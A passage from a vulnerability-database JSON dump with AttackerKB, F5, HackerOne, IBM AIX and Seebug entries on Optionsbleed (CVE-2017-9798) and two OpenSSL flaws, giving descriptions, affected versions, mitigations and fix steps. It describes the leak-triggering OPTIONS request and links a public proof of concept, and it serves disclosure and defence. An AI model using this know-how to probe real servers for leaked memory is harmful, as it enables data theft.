file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.\n\n \n**Recent assessments:** \n \n**h00die** at March 25, 2020 12:20am UTC reported:\n\nThis vulnerability only happens when the `Limit` method is defined. This most likely isn\u2019t very common in enterprise environments, and also the `Limit` method needs to be configured in an invalid way. \nPending all that is true, which is unlikely, its possible to send an `OPTIONS` HTTP request and get back arbitrary memory. \nUnlike Heartbleed, we\u2019re receiving back minimal memory and its also intermingled with the response. \nFrom my testing, against a test server, no useful data was found. 
It\u2019s possible a production server on a very busy website may have divulged more useful data, but it would have to be minimal due to the returned buffer size.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 5\n", "modified": "2020-10-16T00:00:00", "published": "2017-09-18T00:00:00", "id": "AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "href": "https://attackerkb.com/topics/SIdDaaNMPp/cve-2017-9798", "type": "attackerkb", "title": "CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2019-06-28T14:42:24", "bulletinFamily": "software", "cvelist": ["CVE-2017-3737"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-01-26T18:52:00", "published": "2018-01-26T18:52:00", "id": "F5:K43452233", "href": "https://support.f5.com/csp/article/K43452233", "title": "OpenSSL vulnerability CVE-2017-3737", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-06T22:40:46", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nF5 Product Development has assigned ID 684033 (BIG-IP) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions 
known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP AAM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP AFM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP Analytics | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP APM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP ASM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP DNS | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 | Not vulnerable1 | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP Link Controller | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable1 | None \nBIG-IP PEM | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable1 | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable1 | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable1 | None \nBIG-IP WebSafe | None | 13.0.0 - 13.0.1 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable1 | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable1 | None 
\nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations. Additionally, F5 iWorkflow does not run Apache HTTPD.\n\nNone\n\nConfiguring the BIG-IP system to protect vulnerable back-end Apache servers\n\nWhile the BIG-IP system is not vulnerable, the BIG-IP system will proxy exploits to vulnerable Apache servers behind the BIG-IP system. You can protect these servers by disallowing the **OPTIONS** method in all requests. To do so, you can apply any of the following methods to each BIG-IP virtual server:\n\n**Impact of action**: Requests using the **OPTIONS** method will be blocked.\n\n * You can use the **HTTP::method** iRules command to check for the **OPTIONS** method and then perform actions such as returning an HTTP 501 response code to the client. For more information, refer to the following iRules snippet: \n\nwhen HTTP_REQUEST { \n if { [HTTP::method] equals \"OPTIONS\" } { \n HTTP::respond 501 \n } else { \n # additional logic if needed. \n } \n}\n\n * The HTTP profile allows you to limit the permitted HTTP methods in the **Known Methods** setting (under the **Enforcement** section). You can configure the affected HTTP profile with the value **Reject** for the **Unknown Method** setting and delete the value **OPTIONS** from the **Known Methods** setting.\n * For the BIG-IP PSM system, by default, the HTTP Security profile does not allow the HTTP OPTIONS method. You can associate the default HTTP Security profile to the affected virtual servers.\n * For the BIG-IP ASM system, by default, the ASM security policy does not allow the HTTP OPTIONS method. 
You must ensure that the HTTP OPTIONS method is not configured in the **Allowed Methods** setting on the **Security** > **Application Security** > **Headers** > **Methods** page. The BIG-IP ASM system will log an Illegal Method violation when it detects HTTP methods that are not listed in the **Allowed Methods** setting. For more information, refer to [K12312: Overview of BIG-IP ASM Illegal Method violations](<https://support.f5.com/csp/article/K12312>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-08-20T21:19:00", "published": "2017-09-19T08:44:00", "id": "F5:K70084351", "href": "https://support.f5.com/csp/article/K70084351", "title": "Apache HTTPD vulnerability CVE-2017-9798", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-05T00:02:32", "bulletinFamily": "software", "cvelist": ["CVE-2018-0739"], "description": "\nF5 Product Development has assigned ID 713806, 713829, 713821, 713838 (BIG-IP), ID 713971 (BIG-IQ/F5 iWorkflow), ID 713969 (Enterprise Manager), and CPF-24850, CPF-24851, CPF-24852 (Traffix) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H08044291 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. 
To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.2.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Low | [3.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L>) | OpenSSL command line utility \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H>) | OpenSSL command line utility \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a 
version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should avoid processing untrusted PKCS files on the affected systems.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-04-16T23:32:00", "published": "2018-04-13T19:25:00", "id": "F5:K08044291", "href": "https://support.f5.com/csp/article/K08044291", "title": "OpenSSL vulnerability CVE-2018-0739", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "hackerone": [{"lastseen": "2019-01-28T00:16:50", "bulletinFamily": "bugbounty", "bounty": 100.0, "cvelist": ["CVE-2017-9798"], "description": "Bug has been disclosed here:\nhttps://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\n\npoc code:\nhttps://github.com/hannob/optionsbleed\n\nApache is currently preparing 2.4.28, which will contain the fix, a patch is available in their svn repo.", "modified": "2018-05-03T14:45:58", "published": "2017-09-19T18:04:00", "id": "H1:269568", "href": 
"https://hackerone.com/reports/269568", "type": "hackerone", "title": "Apache httpd (IBB): Optionsbleed / CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "aix": [{"lastseen": "2019-05-29T19:19:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3737"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Mon Jan 29 10:36:55 CST 2018\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc\n\n\nSecurity Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2017-3737) \n\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in OpenSSL used by AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2017-3737\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737\n DESCRIPTION: OpenSSL could allow a remote attacker to bypass security \n restrictions, caused by a flaw in the \"error state\" mechanism when \n directly calling SSL_read() or SSL_write() for an SSL object after \n receiving a fatal error. 
An attacker could exploit this vulnerability \n to bypass the decryption or encryption process and perform unauthorized \n actions.\n CVSS Base Score: 5.9 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/136077 for the \n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector:(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N )\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY \n ------------------------------------------------------\n openssl.base 1.0.2.500 1.0.2.1300 key_w_fs\n openssl.base 20.13.102.1000 20.13.102.1300 key_w_fs\n\n Note: \n A. 0.9.8, 1.0.1 OpenSSL versions are out-of-support. Customers are \n advised to upgrade to currently supported OpenSSL 1.0.2 version.\n\n B. Latest level of OpenSSL fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n \n To find out whether the affected filesets are installed on your systems, \n refer to the lslpp command found in the AIX user's guide.\n\n Example: lslpp -L | grep -i openssl.base\n\n REMEDIATION:\n\n FIXES\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar\n http://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar\n https://aix.software.ibm.com/aix/efixes/security/openssl_fix25.tar \n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. 
This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n Note that the tar file contains Interim fixes that are based on \n OpenSSL version, and AIX OpenSSL fixes are cumulative.\n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 102m_ifix.180105.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 5.3, 6.1, 7.1, 7.2 fips_102m.180105.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 2.2.* 102m_ifix.180105.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 2.2.* fips_102m.180105.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n \n To extract the fixes from the tar file:\n\n tar xvf openssl_fix25.tar\n cd openssl_fix25\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ------------------------------------------------------------------------------------------------------\n dbc850209a5920c95493125817dd2cdc90fbc01f44f31dd1c4b19c889cf446e9 102m_ifix.180105.epkg.Z key_w_csum\n 86b9ee0f6367f783fbad4c8a98a32d0481c18252c57ae5ac043cea1bf3d8f0b4 fips_102m.180105.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Support at\n https://ibm.com/support/ and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc.sig \n\n B. FIX AND INTERIM FIX INSTALLATION\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n \n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To 
obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can :\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: \n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2017-3737)\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1026943\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Mon Jan 29 10:36:55 CST 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. 
\n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 4, "modified": "2018-01-29T10:36:55", "published": "2018-01-29T10:36:55", "id": "OPENSSL_ADVISORY25.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory25.asc", "title": "Vulnerability in OpenSSL affects AIX (CVE-2017-3737)", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-0739"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Mon Apr 30 11:00:38 CDT 2018\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc\n\n\nSecurity Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2018-0739) \n\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in OpenSSL used by AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2018-0739 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739\n DESCRIPTION: Constructed ASN.1 types with a recursive definition (such\n as can be found in PKCS7) could eventually exceed the stack given \n malicious 
input with excessive recursion. This could result in a \n Denial Of Service attack. \n CVSS Base Score: 5.3 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/140847 \n for the current score \n CVSS Environmental Score*: Undefined\n CVSS Vector:(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n\n Fileset Lower Level Upper Level KEY \n ------------------------------------------------------\n openssl.base 1.0.2.500 1.0.2.1300 key_w_fs\n openssl.base 20.13.102.1000 20.13.102.1300 key_w_fs\n\n Note: \n A. 0.9.8, 1.0.1 OpenSSL versions are out-of-support. Customers are \n advised to upgrade to currently supported OpenSSL 1.0.2 version.\n\n B. Latest level of OpenSSL fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n \n To find out whether the affected filesets are installed on your systems, \n refer to the lslpp command found in the AIX user's guide.\n\n Example: lslpp -L | grep -i openssl.base\n\n REMEDIATION:\n\n FIXES\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar\n http://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar\n https://aix.software.ibm.com/aix/efixes/security/openssl_fix26.tar \n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n Note that the tar file contains Interim fixes that are based on \n OpenSSL version, and AIX OpenSSL fixes are cumulative.\n\n You must be on the 'prereq for installation' level before\n applying the interim fix. 
This may require installing a new\n level(prereq version) first.\n\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 102ma_ifix.180410.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 5.3, 6.1, 7.1, 7.2 fips_102ma.180410.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 2.2.* 102ma_ifix.180410.epkg.Z openssl.base(1.0.2.1300) key_w_fix\n 2.2.* fips_102ma.180410.epkg.Z openssl.base(20.13.102.1300) key_w_fix\n\n \n To extract the fixes from the tar file:\n\n tar xvf openssl_fix26.tar\n cd openssl_fix26\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ------------------------------------------------------------------------------------------------------\n bfd40e466a6c7976fcf0cb46474087c550c043dc98b0be57689975388100bfdf 102ma_ifix.180410.epkg.Z key_w_csum\n ee752e4a70cd46295141d7441a99e019db0391f6539881c5d185433dd0cd42ae fips_102ma.180410.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Support at\n https://ibm.com/support/ and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc.sig \n\n B. FIX AND INTERIM FIX INSTALLATION\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n \n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To 
obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: \n http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2018-0739)\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1027517 \n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Mon Apr 30 11:00:38 CDT 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 4, "modified": "2018-04-30T11:00:38", "published": "2018-04-30T11:00:38", "id": "OPENSSL_ADVISORY26.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory26.asc", "title": "Vulnerability in OpenSSL affects AIX (CVE-2018-0739)", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:01:02", "description": "If you're using the HTTP protocol in everyday Internet use you are usually only using two of its methods: GET and POST. However HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities.\r\n\r\nOne HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the \"Allow\" header and gives us a comma separated list of supported methods.\r\n\r\nA scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an \"Allow\" header with what looked like corrupted data. Some examples:\r\n```\r\nAllow: ,GET,,,POST,OPTIONS,HEAD,,\r\nAllow: POST,OPTIONS,,HEAD,:09:44 GMT\r\nAllow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\r\nAllow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE\r\n```\r\n\r\n\r\n\r\nThat clearly looked 